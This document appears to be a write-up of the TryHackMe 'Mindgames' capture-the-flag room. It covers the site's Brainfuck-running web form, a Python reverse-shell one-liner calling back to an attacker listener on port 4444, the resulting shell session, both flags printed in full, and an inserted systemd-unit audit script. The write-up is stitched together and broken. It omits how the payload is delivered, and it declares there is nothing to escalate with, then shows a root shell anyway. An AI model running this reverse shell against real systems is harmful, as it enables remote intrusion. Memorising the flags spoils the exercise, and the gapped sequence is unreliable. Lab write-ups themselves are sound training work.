Description:
Just a bad idea...
No hints. Attack it. Don't give up when you get stuck, enumerate more.
Link: https://tryhackme.com/room/mindgames
We start by enumerating services with Nmap; the interesting one is the web server on port 80, which we fetch with curl:
user㉿parrot:/data/Mindgames$ curl -s http://10.10.211.54
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Mindgames.</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" media="screen" href="/main.css">
<script src="/main.js"></script>
</head>
<body onload="onLoad()">
<h1>Sometimes, people have bad ideas.</h1>
<h1>Sometimes those bad ideas get turned into a CTF box.</h1>
<h1>I'm so sorry.</h1> <!-- That's a lie, I enjoyed making this. -->
<p>Ever thought that programming was a little too easy? Well, I have just the product for you. Look at the example code below, then give it a go yourself!</p>
<p>Like it? Purchase a license today for the low, low price of 0.009BTC/yr!</p>
<h2>Hello, World</h2>
<pre><code>+[------->++<]>++.++.---------.+++++.++++++.+[--->+<]>+.------.++[->++<]>.-[->+++++<]>++.+++++++..+++.[->+++++<]>+.------------.---[->+++<]>.-[--->+<]>---.+++.------.--------.-[--->+<]>+.+++++++.>++++++++++.</code></pre>
<h2>Fibonacci</h2>
<pre><code>--[----->+<]>--.+.+.[--->+<]>--.+++[->++<]>.[-->+<]>+++++.[--->++<]>--.++[++>---<]>+.-[-->+++<]>--.>++++++++++.[->+++<]>++....-[--->++<]>-.---.[--->+<]>--.+[----->+<]>+.-[->+++++<]>-.--[->++<]>.+.+[-->+<]>+.[-->+++<]>+.+++++++++.>++++++++++.[->+++<]>++........---[----->++<]>.-------------.[--->+<]>---.+.---.----.-[->+++++<]>-.[-->+++<]>+.>++++++++++.[->+++<]>++....---[----->++<]>.-------------.[--->+<]>---.+.---.----.-[->+++++<]>-.+++[->++<]>.[-->+<]>+++++.[--->++<]>--.[----->++<]>+.++++.--------.++.-[--->+++++<]>.[-->+<]>+++++.[--->++<]>--.[----->++<]>+.+++++.---------.>++++++++++...[--->+++++<]>.+++++++++.+++.[-->+++++<]>+++.-[--->++<]>-.[--->+<]>---.-[--->++<]>-.+++++.-[->+++++<]>-.---[----->++<]>.+++[->+++<]>++.+++++++++++++.-------.--.--[->+++<]>-.+++++++++.-.-------.-[-->+++<]>--.>++++++++++.[->+++<]>++....[-->+++++++<]>.++.---------.+++++.++++++.+[--->+<]>+.-----[->++<]>.[-->+<]>+++++.-----[->+++<]>.[----->++<]>-..>++++++++++.</code></pre>
<h2>Try before you buy.</h2>
<form id="codeForm">
<textarea id="code" placeholder="Enter your code here..."></textarea><br>
<button>Run it!</button>
</form>
<p></p>
<label for="outputBox">Program Output:</label>
<pre id="outputBox"></pre>
</body>
</html>
Intercepting the requests with Burp Suite reveals that the form posts its contents to /api/bf asynchronously, via JavaScript (main.js):
async function postData(url = "", data = "") {
  // Default options are marked with *
  const response = await fetch(url, {
    method: 'POST', // *GET, POST, PUT, DELETE, etc.
    cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached
    credentials: 'same-origin', // include, *same-origin, omit
    headers: {
      'Content-Type': 'text/plain' // the program is sent as a raw text body, not JSON or a form
    },
    redirect: 'follow', // manual, *follow, error
    referrerPolicy: 'no-referrer', // no-referrer, *client
    body: data // body data type must match "Content-Type" header
  });
  return response; // We don't always want JSON back
}
function onLoad() {
  // Intercept the form submit so the page does not reload
  document.querySelector("#codeForm").addEventListener("submit", function (event) {
    event.preventDefault()
    runCode()
  });
}
async function runCode() {
  const programBox = document.querySelector("#code")
  const outBox = document.querySelector("#outputBox")
  // POST the textarea contents to /api/bf and show the raw response text
  outBox.textContent = await (await postData("/api/bf", programBox.value)).text()
}
Reverse shell (Python one-liner, connecting back to the listener on 10.8.50.72:4444):
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);
user㉿parrot:/data/Mindgames$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.211.54] 38032
bash: cannot set terminal process group (677): Inappropriate ioctl for device
bash: no job control in this shell
mindgames@mindgames:~/webserver$ id
id
uid=1001(mindgames) gid=1001(mindgames) groups=1001(mindgames)
mindgames@mindgames:~/webserver$
USER FLAG:
mindgames@mindgames:~/webserver$ cd /home
cd /home
mindgames@mindgames:/home$ ls -l
ls -l
total 8
drwxr-xr-x 6 mindgames mindgames 4096 May 11 15:36 mindgames
drwxr-x--- 5 tryhackme tryhackme 4096 May 11 15:25 tryhackme
mindgames@mindgames:/home$ cd mindgames
cd mindgames
mindgames@mindgames:~$ ls -la
ls -la
total 40
drwxr-xr-x 6 mindgames mindgames 4096 May 11 15:36 .
drwxr-xr-x 4 root root 4096 May 11 13:48 ..
lrwxrwxrwx 1 mindgames mindgames 9 May 11 15:25 .bash_history -> /dev/null
-rw-r--r-- 1 mindgames mindgames 220 May 11 13:48 .bash_logout
-rw-r--r-- 1 mindgames mindgames 3771 May 11 13:48 .bashrc
drwx------ 2 mindgames mindgames 4096 May 11 14:07 .cache
drwx------ 3 mindgames mindgames 4096 May 11 14:07 .gnupg
drwxrwxr-x 3 mindgames mindgames 4096 May 11 15:24 .local
-rw-r--r-- 1 mindgames mindgames 807 May 11 13:48 .profile
-rw-rw-r-- 1 mindgames mindgames 38 May 11 15:24 user.txt
drwxrwxr-x 3 mindgames mindgames 4096 May 11 15:36 webserver
mindgames@mindgames:~$ cat user.txt
cat user.txt
thm{411f7d38247ff441ce4e134b459b6268}
ROOT FLAG:
mindgames@mindgames:/etc/systemd/system/multi-user.target.wants$ cat server.service
[Unit]
Description=Production Web Server
[Service]
User=mindgames
Group=mindgames
WorkingDirectory=/home/mindgames/webserver
ExecStart=/home/mindgames/webserver/server -p 80
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
mindgames@mindgames:/etc/systemd/system/multi-user.target.wants$ ls -la server.service
lrwxrwxrwx 1 root root 34 May 11 15:33 server.service -> /etc/systemd/system/server.service
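The check being done on server.service above is whether a unit we can influence runs with more privilege than we have. Written out, it comes down to three facts: the User= the service runs as (root when the key is absent), whether the ExecStart binary or its directory is writable by us, and whether Restart= will re-run it. The following audit is an added example, not code from the page or the room; the unit text is a copy of the one above, and the writable check is injectable so the logic can be run on a machine where those paths do not exist.

```python
"""Audit a systemd unit for the facts that matter in a privesc check (added example)."""
import os
import shlex
from typing import Callable, Dict

# Constructed copy of the server.service shown on the page.
SERVER_SERVICE = """\
[Unit]
Description=Production Web Server
[Service]
User=mindgames
Group=mindgames
WorkingDirectory=/home/mindgames/webserver
ExecStart=/home/mindgames/webserver/server -p 80
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
"""


def parse_unit(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a unit file into {section: {key: value}}; the last value of a key wins."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip()] = value.strip()
    return sections


def audit_unit(
    text: str,
    writable: Callable[[str], bool] = lambda p: os.access(p, os.W_OK),
) -> Dict[str, object]:
    """Return who the service runs as and whether we could control what it executes.

    'controllable' means we can replace the binary, drop a file in its directory
    or in its WorkingDirectory; 'privesc' additionally requires the unit to run
    as root. Restart=always means a controlled binary runs after a crash/restart.
    """
    svc = parse_unit(text).get("Service", {})
    user = svc.get("User", "root")  # systemd runs as root when User= is absent
    argv = shlex.split(svc.get("ExecStart", ""))
    # ExecStart may carry a prefix such as '-', '@', '+', '!' or ':'.
    binary = argv[0].lstrip("-@+!:") if argv else ""
    workdir = svc.get("WorkingDirectory", "")
    candidates = [p for p in (binary, os.path.dirname(binary), workdir) if p]
    controllable = any(writable(p) for p in candidates)
    return {
        "user": user,
        "binary": binary,
        "restarts": svc.get("Restart", "no") != "no",
        "controllable": controllable,
        "privesc": controllable and user == "root",
    }


if __name__ == "__main__":
    print(audit_unit(SERVER_SERVICE))
```

On the box the binary lives in mindgames's own home directory, so it is controllable, but the unit runs as mindgames, so the audit reports controllable without privesc; only a unit that lacks User= (or sets it to root) while pointing at a path we can write turns this into an escalation.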
The unit file and the symlink pointing at it are both owned by root, and the service already runs as mindgames, so the ExecStart binary sitting in mindgames's home directory gives nothing to escalate with. Finally, as root:
root@mindgames:~# cat /root/root.txt
thm{1974a617cc84c5b51411c283544ee254}
RECAP:
User flag.
thm{411f7d38247ff441ce4e134b459b6268}
Root flag.
thm{1974a617cc84c5b51411c283544ee254}